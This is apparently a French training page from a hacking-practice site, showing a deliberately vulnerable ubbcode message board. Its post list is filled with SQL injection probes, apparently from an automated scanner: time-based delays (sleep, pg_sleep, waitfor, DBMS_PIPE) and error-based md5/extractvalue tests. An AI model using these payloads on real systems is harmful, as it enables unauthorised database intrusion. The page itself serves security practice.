[HackBBS] Hack en situation réel

Faille ubbcode en place.

Exemple de ubbCode:
[b]test[/b]
[url=http://hackbbs.org]blah[/url]
[img]http://hackbbs.org/banniere.jpg[/img]

Parser < et > ne suffis pas. Utiliser de l'ubbcode ne suffis pas. Ne jamais faire confiance à ce qui est envoyé par un client!!!

Message :


  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',2)='w
  • Anonyme:>maJhgCIXGp'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',0)='y
  • Anonyme:>maJhgCIXGp'and(select+1)0waitfor/**/delay'0:0:2
  • Anonyme:>maJhgCIXGp'and(select+1)0waitfor/**/delay'0:0:0
  • Anonyme:>maJhgCIXGp'/**/and(select'1'from/**/pg_sleep(2))'0
  • Anonyme:>maJhgCIXGp'/**/and(select'1'from/**/pg_sleep(0))'0
  • Anonyme:>maJhgCIXGp"and(select*from(select+sleep(2))a/**/union/**/select+1)="
  • Anonyme:>maJhgCIXGp"and(select*from(select+sleep(0))a/**/union/**/select+1)="
  • Anonyme:>maJhgCIXGp'and(select*from(select+sleep(2))a/**/union/**/select+1)='
  • Anonyme:>maJhgCIXGp'and(select*from(select+sleep(0))a/**/union/**/select+1)='
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp"and"h"="k
  • Anonyme:>maJhgCIXGp"and"l"="l
  • Anonyme:>maJhgCIXGp'and'w'='c
  • Anonyme:>maJhgCIXGp'and'k'='k
  • Anonyme:>maJhgCIXGp'"\(
  • Anonyme:>maJhgCIXGp鎈'"\(
  • Anonyme:>maJhgCIXGp'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1309581494')))'0
  • Anonyme:>convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1231372758')))
  • Anonyme:>maJhgCIXGp/**/and/**/cast(md5('1099647242')as/**/int)0
  • Anonyme:>maJhgCIXGp'and(select'1'from/**/cast(md5(1452626597)as/**/int))'0
  • Anonyme:>extractvalue(1,concat(char(126),md5(1960467063)))
  • Anonyme:>maJhgCIXGp"and/**/extractvalue(1,concat(char(126),md5(1871007057)))and"
  • Anonyme:>maJhgCIXGp'and/**/extractvalue(1,concat(char(126),md5(1368274732)))and'
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>maJhgCIXGp
  • Anonyme:>help
  • Anonyme:>test
  • Anonyme:>
  • Anonyme:>
  • Anonyme:>bonjour a tous
  • Anonyme:>oui quoi
  • Anonyme:>img src